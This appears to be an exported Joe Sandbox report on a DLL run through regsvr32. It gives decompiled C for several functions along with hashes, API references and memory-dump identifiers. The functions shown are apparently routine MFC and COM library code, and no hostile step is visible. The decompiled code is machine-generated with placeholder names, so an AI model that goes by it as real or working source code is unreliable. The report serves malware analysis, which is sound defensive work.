Opcode ID: 09606ba36b7aecd50468a09a55177cada03553f3ba25f0a45b1df38c9686ac77
Instruction ID: 497c310cc3923061e9ddd0617e68816462549549d5104481a026dd38a865dc70
Opcode Fuzzy Hash: 09606ba36b7aecd50468a09a55177cada03553f3ba25f0a45b1df38c9686ac77
Instruction Fuzzy Hash: 89519875A00B01DFDB64CF68C98296AB7F1FF48314B604A6DE5828BA92C770F881CF40

Uniqueness

Uniqueness Score: -1.00%

Function 1002E109 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E1002E109(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				signed int _v4;
				void* _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v60;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				short _v84;
				signed int _v88;
				signed int _v92;
				short _v96;
				short _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v124;
				signed int* _t79;
				void* _t90;
				intOrPtr _t97;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				signed int _t120;
				signed int _t128;
				signed int _t131;
				intOrPtr _t132;
				void* _t155;

				_t153 = __edi;
				_push(0x70);
				E1004764D(0x100902ef, __ebx, __edi, __esi);
				_t155 = __ecx;
				_t79 =  *(__ecx + 0x50);
				_t128 = 0;
				_t131 = 0 | _t79 != 0x00000000;
				if(_t131 != 0) {
					_push( &_v16);
					_push(0x100a5eec);
					_v16 = 0;
					_t131 =  *_t79;
					_push(_t79);
					_v20 = 0;
					if( *_t131() < 0) {
						L19:
						return E10047725(_v20);
					} else {
						if((0 | _v16 != 0x00000000) == 0) {
							goto L4;
						} else {
							_v120 = __ecx + 0xc8;
							_v112 = __ecx + 0xd8;
							_v108 = __ecx + 0xdc;
							_v124 = 0x40;
							_v116 = 0;
							_v88 = 0;
							_v76 = 0;
							_v72 = 0;
							E100235FF( &_v36);
							_t97 =  *((intOrPtr*)(__ecx + 0x20));
							_v4 = 0;
							if(_t97 == 0) {
								goto L4;
							} else {
								_t153 =  *((intOrPtr*)(_t97 + 0x20));
								_v104 = 0;
								if(_t153 == 0) {
									goto L4;
								} else {
									do {
										_t31 = _t128 + 0x1009df98; // 0xfffffd3b
										 *((intOrPtr*)( *_t153 + 0x104))(_t155,  *_t31,  &_v36);
										if(_v28 != 0) {
											_t34 = _t128 + 0x1009df9c; // 0x4
											_v104 = _v104 |  *_t34;
										}
										_t128 = _t128 + 8;
									} while (_t128 < 0x40);
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd40,  &_v36);
									_v100 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd43,  &_v36);
									_v96 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd34,  &_v36);
									_v84 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd3f,  &_v36);
									_v80 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd41,  &_v36);
									_t114 = _v28;
									_push( &_v92);
									_push(0x100a601c);
									_push(_t114);
									if( *((intOrPtr*)( *_t114))() < 0) {
										_v92 = _v92 & 0x00000000;
									}
									_t116 = _v16;
									_push( &_v60);
									_push( &_v124);
									_v60 = 0x18;
									_push(_t116);
									if( *((intOrPtr*)( *_t116 + 0xc))() >= 0) {
										 *((intOrPtr*)(_t155 + 0x70)) = _v56;
										 *((intOrPtr*)(_t155 + 0x60)) = _v48;
										 *((intOrPtr*)(_t155 + 0x64)) = _v44;
										_v20 = 1;
									}
									_t118 = _v16;
									 *((intOrPtr*)( *_t118 + 8))(_t118);
									_t120 = _v92;
									if(_t120 != 0) {
										 *((intOrPtr*)( *_t120 + 8))(_t120);
									}
									__imp__#9( &_v36);
									goto L19;
								}
							}
						}
					}
				} else {
					L4:
					_push(_t131);
					_v24 = 0x100b8618;
					L10048E48( &_v24, 0x100aff30);
					asm("int3");
					_push(4);
					E1004764D(0x1008dd26, _t128, _t153, _t155);
					_t132 = E10020454(0x104);
					_v36 = _t132;
					_t90 = 0;
					_v24 = 0;
					if(_t132 != 0) {
						_t90 = E1001DB72(_t132);
					}
					return E10047725(_t90);
				}
			}

0x1002e109
0x1002e109
0x1002e110
0x1002e115
0x1002e117
0x1002e11c
0x1002e120
0x1002e125
0x1002e12f
0x1002e130
0x1002e135
0x1002e138
0x1002e13a
0x1002e13b
0x1002e142
0x1002e2b7
0x1002e2bf
0x1002e148
0x1002e152
0x00000000
0x1002e154
0x1002e15a
0x1002e163
0x1002e16c
0x1002e173
0x1002e17a
0x1002e17d
0x1002e180
0x1002e183
0x1002e186
0x1002e18b
0x1002e190
0x1002e193
0x00000000
0x1002e195
0x1002e195
0x1002e19a
0x1002e19d
0x00000000
0x1002e19f
0x1002e19f
0x1002e1a5
0x1002e1ae
0x1002e1b9
0x1002e1bb
0x1002e1c1
0x1002e1c1
0x1002e1c4
0x1002e1c7
0x1002e1da
0x1002e1ec
0x1002e1f4
0x1002e206
0x1002e20e
0x1002e221
0x1002e229
0x1002e23b
0x1002e243
0x1002e249
0x1002e251
0x1002e252
0x1002e257
0x1002e25c
0x1002e25e
0x1002e25e
0x1002e262
0x1002e268
0x1002e26c
0x1002e26d
0x1002e276
0x1002e27c
0x1002e281
0x1002e287
0x1002e28d
0x1002e290
0x1002e290
0x1002e297
0x1002e29d
0x1002e2a0
0x1002e2a5
0x1002e2aa
0x1002e2aa
0x1002e2b1
0x00000000
0x1002e2b1
0x1002e19d
0x1002e193
0x1002e152
0x1002e127
0x1002e127
0x1000a06c
0x1000a076
0x1000a07d
0x1000a082
0x1000a083
0x1000a08a
0x1000a099
0x1000a09b
0x1000a09e
0x1000a0a2
0x1000a0a5
0x1000a0a7
0x1000a0a7
0x1000a0b1
0x1000a0b1

APIs

__EH_prolog3.LIBCMT ref: 1002E110

Strings

@, xrefs: 1002E173

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3
String ID: @
API String ID: 431132790-2766056989
Opcode ID: e4fe646538f7a1e1a6620cc9ee88ccb0437611cecabb20d81ca85b59a8d3e10e
Instruction ID: 27d6e068b945a38a4e3262720f663981c887c24b1d40a3015d78c7ca2024549e
Opcode Fuzzy Hash: e4fe646538f7a1e1a6620cc9ee88ccb0437611cecabb20d81ca85b59a8d3e10e
Instruction Fuzzy Hash: 3651C470E0025A9FDB04CFA8C888AEEB7F9FF48304B60456AE516EB251E775AD45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10017046 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E10017046(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t35;
				intOrPtr* _t37;
				intOrPtr* _t38;
				void* _t40;
				intOrPtr* _t54;
				void* _t56;
				intOrPtr _t57;
				void* _t61;
				void* _t64;
				intOrPtr _t66;
				void* _t76;

				_t76 = __eflags;
				E10021FD9(1);
				L10048E48(0, 0);
				asm("int3");
				_push(_t56);
				_push(_t64);
				_push(_t61);
				_t66 = E1001DD4F(_t56, _t61, _t64, _t76) + 0x7c;
				_t57 =  *((intOrPtr*)(E1001E302(_t56, _t61, _t66, _t76) + 8));
				if(_a8 != 0 || _a12 != 0) {
					L5:
					_v8 =  *((intOrPtr*)(E10049097(__eflags)));
					_t35 = E10049097(__eflags);
					_push(_a16);
					 *_t35 = 0;
					_push(_a12);
					_push(_a8);
					_push(_a4);
					E1004C1D3(_t66, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t57);
				} else {
					_t79 = _a16;
					if(_a16 != 0) {
						goto L5;
					} else {
						_v8 =  *((intOrPtr*)(E10049097(_t79)));
						_t54 = E10049097(_t79);
						_push(_a4);
						 *_t54 = 0;
						E1004C1D3(_t66, 0x60, 0x5f, "Afx:%p:%x", _t57);
					}
				}
				_t37 = E10049097(_t79);
				_t80 =  *_t37;
				if( *_t37 == 0) {
					_t38 = E10049097(__eflags);
					_t60 = _v8;
					 *_t38 = _v8;
				} else {
					L1000AD19( *((intOrPtr*)(E10049097(_t80))));
					_pop(_t60);
				}
				_push( &_v48);
				_push(_t66);
				_push(_t57);
				_t40 = E1001242B(_t57, _t60, 0, _t66, _t80);
				_t81 = _t40;
				if(_t40 == 0) {
					_v48 = _a4;
					_v44 = DefWindowProcA;
					_v28 = _a16;
					_v24 = _a8;
					_v20 = _a12;
					_push( &_v48);
					_v36 = 0;
					_v40 = 0;
					_v32 = _t57;
					_v16 = 0;
					_v12 = _t66;
					if(L10016FC9(_t57, _t60, 0, _t66, _t81) == 0) {
						E1000C2E1(_t60);
					}
				}
				return _t66;
			}

0x10017046
0x10017048
0x10017051
0x10017056
0x1001705d
0x1001705e
0x1001705f
0x10017067
0x1001706f
0x10017077
0x100170ac
0x100170b3
0x100170b6
0x100170bb
0x100170be
0x100170c0
0x100170c3
0x100170c6
0x100170d4
0x1001707e
0x1001707e
0x10017081
0x00000000
0x10017083
0x1001708a
0x1001708d
0x10017092
0x10017095
0x100170a2
0x100170a7
0x10017081
0x100170dc
0x100170e1
0x100170e3
0x100170f4
0x100170f9
0x100170fc
0x100170e5
0x100170ec
0x100170f1
0x100170f1
0x10017101
0x10017102
0x10017103
0x10017104
0x1001710c
0x1001710e
0x10017113
0x1001711b
0x10017121
0x10017127
0x1001712d
0x10017133
0x10017134
0x10017137
0x1001713a
0x1001713d
0x10017140
0x1001714a
0x1001714c
0x1001714c
0x1001714a
0x10017157

APIs

Part of subcall function 10021FD9: LeaveCriticalSection.KERNEL32(?,10020559,00000010,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE,00000000), ref: 10021FF0

__CxxThrowException@8.LIBCMT ref: 10017051

Part of subcall function 10048E48: RaiseException.KERNEL32(00000001,?,?,00000058,00000001,?,1000CECE,00000000,?,00000058,10006BB6), ref: 10048E88

__snprintf_s.LIBCMT ref: 100170A2

Part of subcall function 1004C1D3: __vsnprintf_s_l.LIBCMT ref: 1004C1E8

__snprintf_s.LIBCMT ref: 100170D4

Part of subcall function 10049097: __getptd_noexit.LIBCMT ref: 10049097

Strings

Afx:%p:%x, xrefs: 10017098

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: __snprintf_s$CriticalExceptionException@8LeaveRaiseSectionThrow__getptd_noexit__vsnprintf_s_l
String ID: Afx:%p:%x
API String ID: 3966753335-3201128726
Opcode ID: a2364757c673005b9556abfa695244951a75b134b50bb4799cc6880a16461c15
Instruction ID: 1dbae72e943724650c3f85dc51fc8ef03dc1c7148edf81a1682273a05273279e
Opcode Fuzzy Hash: a2364757c673005b9556abfa695244951a75b134b50bb4799cc6880a16461c15
Instruction Fuzzy Hash: 64212EB5900309EFDB11DFA9D841A9EBBF4FF49290F114026F908AB252D770E9818BA5

Uniqueness

Uniqueness Score: -1.00%

Function 10041624 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E10041624(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t43;
				signed short* _t47;
				void* _t52;
				intOrPtr* _t56;
				void* _t57;
				void* _t60;

				_t60 = __eflags;
				_push(0x10);
				E10047680(0x100915ca, __ebx, __edi, __esi);
				_t56 =  *((intOrPtr*)(_t57 + 8)) + 0xffffffd0;
				E1001E397(_t57 - 0x1c, _t60,  *((intOrPtr*)( *((intOrPtr*)(_t57 + 8)) - 0x14)));
				_t47 =  *(_t57 + 0xc);
				 *(_t57 - 4) =  *(_t57 - 4) & 0x00000000;
				_t52 = E1004104F(_t56, _t47, 1);
				if(_t52 != 0) {
					E10049170(_t52,  *((intOrPtr*)(_t57 + 0x10)), 0, 0xc);
					_t12 = _t52 + 0x14; // 0x14
					_t36 = _t12;
					__eflags =  *_t12;
					if(__eflags == 0) {
						 *((intOrPtr*)(_t57 + 8)) = 0x80040064;
						 *(_t57 - 4) = 1;
						_t38 =  *((intOrPtr*)( *_t56 + 0x58))(_t47,  *((intOrPtr*)(_t57 + 0x10)));
						__eflags = _t38;
						if(_t38 != 0) {
							 *((intOrPtr*)(_t57 + 8)) = 0;
						}
						 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
						__eflags =  *((intOrPtr*)(_t57 - 0x18));
						if( *((intOrPtr*)(_t57 - 0x18)) != 0) {
							_push( *((intOrPtr*)(_t57 - 0x1c)));
							_push(0);
							E1001D714();
						}
						_t39 =  *((intOrPtr*)(_t57 + 8));
					} else {
						_t43 = E1000B0A9(_t47, 0, _t56, __eflags,  *_t47 & 0x0000ffff,  *((intOrPtr*)(_t57 + 0x10)), _t36);
						 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
						__eflags = _t43;
						if(_t43 != 0) {
							__eflags =  *((intOrPtr*)(_t57 - 0x18));
							if( *((intOrPtr*)(_t57 - 0x18)) != 0) {
								_push( *((intOrPtr*)(_t57 - 0x1c)));
								_push(0);
								E1001D714();
							}
							_t39 = 0;
						} else {
							__eflags =  *((intOrPtr*)(_t57 - 0x18));
							if( *((intOrPtr*)(_t57 - 0x18)) == 0) {
								goto L4;
							} else {
								_push( *((intOrPtr*)(_t57 - 0x1c)));
								_push(0);
								goto L3;
							}
							L18:
						}
					}
				} else {
					 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
					if( *((intOrPtr*)(_t57 - 0x18)) != 0) {
						_push( *((intOrPtr*)(_t57 - 0x1c)));
						_push(0);
						L3:
						E1001D714();
					}
					L4:
					_t39 = 0x80040064;
				}
				return E10047725(_t39);
				goto L18;
			}

0x10041624
0x10041624
0x1004162b
0x10041636
0x1004163c
0x10041641
0x10041644
0x10041652
0x10041658
0x1004167c
0x10041681
0x10041681
0x10041689
0x1004168b
0x100416c7
0x100416ce
0x100416d2
0x100416d5
0x100416d7
0x100416d9
0x100416d9
0x100416f9
0x100416fd
0x10041700
0x10041702
0x10041705
0x10041706
0x10041706
0x1004170b
0x1004168d
0x10041695
0x1004169a
0x1004169e
0x100416a0
0x100416ad
0x100416b0
0x100416b2
0x100416b5
0x100416b6
0x100416b6
0x100416bb
0x100416a2
0x100416a2
0x100416a5
0x00000000
0x100416a7
0x100416a7
0x100416aa
0x00000000
0x100416aa
0x00000000
0x100416a5
0x100416a0
0x1004165a
0x1004165a
0x10041661
0x10041663
0x10041666
0x10041667
0x10041667
0x10041667
0x1004166c
0x1004166c
0x1004166c
0x10041713
0x00000000

APIs

__EH_prolog3_catch.LIBCMT ref: 1004162B
_memset.LIBCMT ref: 1004167C

Strings

d, xrefs: 100416C7

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3_catch_memset
String ID: d
API String ID: 1022661273-2564639436
Opcode ID: b9e012aa01af075eff093844a8ffeee4cf2b831100157110da877549c92efa64
Instruction ID: f21327fa9afeab172bd533079007e35d76d7159773825f99a2a971ae6053a1df
Opcode Fuzzy Hash: b9e012aa01af075eff093844a8ffeee4cf2b831100157110da877549c92efa64
Instruction Fuzzy Hash: E9218D30A00649EBCF11DFA4C881AEE7BB6EF04354F324625F560EA091D735DA91DB69

Uniqueness

Uniqueness Score: -1.00%

Function 10029E28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10029E28(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t21;
				struct HINSTANCE__* _t25;
				_Unknown_base(*)()* _t26;
				void* _t29;
				signed int* _t48;
				void* _t49;
				void* _t50;
				void* _t51;

				_t51 = __eflags;
				_t44 = __edx;
				_t34 = __ebx;
				_push(4);
				E1004764D(0x1008ff93, __ebx, __edi, __esi);
				_t48 =  *(_t50 + 0x10);
				 *_t48 =  *_t48 & 0x00000000;
				E10029D24(__ebx, __edx, __edi, _t51, _t50 - 0x10,  *((intOrPtr*)(_t50 + 8)));
				 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
				_t21 = E100184C0();
				_t35 = _t50 + 0x10;
				L1000140B(_t50 + 0x10, _t21);
				 *(_t50 - 4) = 1;
				if(E100296B0(__ebx,  *((intOrPtr*)(_t50 - 0x10)), _t50 + 0x10) != 0) {
					_t46 =  *(_t50 + 0x10);
					_push( *(_t50 + 0x10));
					_t25 = E10012699(_t34, _t35,  *(_t50 + 0x10), _t48, __eflags);
					__eflags = _t25;
					if(_t25 != 0) {
						_t26 = GetProcAddress(_t25, "DllGetClassObject");
						__eflags = _t26;
						if(_t26 == 0) {
							_t49 = 0x800401f9;
						} else {
							_t49 =  *_t26( *((intOrPtr*)(_t50 + 8)),  *((intOrPtr*)(_t50 + 0xc)), _t48);
						}
					} else {
						_t49 = 0x80040154;
					}
					L100013E3(_t46 - 0x10, _t44);
					L100013E3( *((intOrPtr*)(_t50 - 0x10)) + 0xfffffff0, _t44);
					_t29 = _t49;
				} else {
					L100013E3( &(( *(_t50 + 0x10))[0xfffffffffffffffc]), __edx);
					L100013E3( *((intOrPtr*)(_t50 - 0x10)) + 0xfffffff0, __edx);
					_t29 = 0x80040154;
				}
				return E10047725(_t29);
			}

0x10029e28
0x10029e28
0x10029e28
0x10029e28
0x10029e2f
0x10029e37
0x10029e3a
0x10029e41
0x10029e46
0x10029e4a
0x10029e50
0x10029e53
0x10029e5f
0x10029e6a
0x10029e8f
0x10029e92
0x10029e93
0x10029e98
0x10029e9b
0x10029ebf
0x10029ec5
0x10029ec7
0x10029ed6
0x10029ec9
0x10029ed2
0x10029ed2
0x10029e9d
0x10029e9d
0x10029e9d
0x10029ea5
0x10029eb0
0x10029eb5
0x10029e6c
0x10029e72
0x10029e7d
0x10029e82
0x10029e82
0x10029e8c

APIs

__EH_prolog3.LIBCMT ref: 10029E2F

Part of subcall function 10029D24: _swprintf.LIBCMT ref: 10029D8A

Part of subcall function 100296B0: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 100296E8
Part of subcall function 100296B0: RegOpenKeyA.ADVAPI32(?,?,?), ref: 100296FC
Part of subcall function 100296B0: RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 10029717
Part of subcall function 100296B0: RegQueryValueExA.ADVAPI32 ref: 10029731
Part of subcall function 100296B0: RegCloseKey.ADVAPI32(?), ref: 10029741
Part of subcall function 100296B0: RegCloseKey.ADVAPI32(?), ref: 10029746
Part of subcall function 100296B0: RegCloseKey.ADVAPI32(?), ref: 1002974B

GetProcAddress.KERNEL32(00000000,DllGetClassObject,00000000,00000004,10029F08,?,100A592C,00000000), ref: 10029EBF

Strings

DllGetClassObject, xrefs: 10029EB9

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseOpen$AddressH_prolog3ProcQueryValue_swprintf
String ID: DllGetClassObject
API String ID: 2239898804-1075368562
Opcode ID: 9008d4399bc21897604654863b1c71837f69836ba958acecc525d96e6063ee5b
Instruction ID: b806fbc304eb1717afb72819c6f168350187bc08b8103b5c1930cd9a947c6215
Opcode Fuzzy Hash: 9008d4399bc21897604654863b1c71837f69836ba958acecc525d96e6063ee5b
Instruction Fuzzy Hash: FD118F79900256ABDF00DFA0CC41BAE37A4FF403A4F550528B924A72E2DB74A910D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 1003F90E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1003F90E(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				struct HWND__* _v52;
				unsigned int _v76;
				intOrPtr _v80;
				char _v84;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t30;
				void* _t35;
				void* _t36;
				intOrPtr* _t37;

				_t37 = __ecx;
				_t36 = E10013F46(__ebx, __ecx, _t35, __eflags);
				_t39 = _t36;
				if(_t36 != 0) {
					_v84 = 0x50;
					_v80 = 0x11;
					 *((intOrPtr*)( *_t37 + 0x110))(0x41d, _a4,  &_v84);
					_t16 = E100203C2(0x1009e47c, E10014011(_t37, _t36, _t37, _t39, _v52));
					if(_t16 == 0) {
						_t19 = GetWindowLongA(_v52, 0xfffffff0) >> 0x0000001c & 0x00000001;
						__eflags = _t19;
					} else {
						_t19 =  *((intOrPtr*)( *_t16 + 0x154))();
					}
					_t30 =  !(_v76 >> 3) & 0x00000001;
					if(_t19 != _t30) {
						asm("sbb ecx, ecx");
						ShowWindow(_v52,  ~_t30 & 0x00000005);
					}
				}
				return _t36;
			}

0x1003f916
0x1003f91d
0x1003f91f
0x1003f921
0x1003f933
0x1003f93a
0x1003f941
0x1003f955
0x1003f95e
0x1003f97a
0x1003f97a
0x1003f960
0x1003f964
0x1003f964
0x1003f985
0x1003f98a
0x1003f98e
0x1003f997
0x1003f997
0x1003f98a
0x1003f9a2

APIs

GetWindowLongA.USER32(?,000000F0), ref: 1003F971
ShowWindow.USER32(?,?), ref: 1003F997

Strings

P, xrefs: 1003F933

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$LongShow
String ID: P
API String ID: 2659037557-3110715001
Opcode ID: 1ab7d56d4179d4e8b5d6a0f99de9d15fc7cca27e39cc9b254fc4de0f0fc89069
Instruction ID: 9d75cb92e2a5c536025ce107791e61cda28db8ead2f2e4480c91a0b11d871f17
Opcode Fuzzy Hash: 1ab7d56d4179d4e8b5d6a0f99de9d15fc7cca27e39cc9b254fc4de0f0fc89069
Instruction Fuzzy Hash: C801C435620114AFDB099B64CC4AAFE7BB5EF44711F05022DF592DA195DB749844CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10019B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E10019B8F(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x100b9e70; // 0x6fb3f782
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E10019530(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E100198A8(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E1004763E(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

0x10019b98
0x10019b9f
0x10019ba5
0x10019bb5
0x10019bbd
0x10019c14
0x10019c14
0x10019c14
0x10019bc3
0x10019bcb
0x10019bd1
0x10019bd9
0x10019bda
0x10019bde
0x10019be9
0x10019bef
0x10019bf0
0x10019bf1
0x00000000
0x10019bf3
0x10019bfe
0x10019c0d
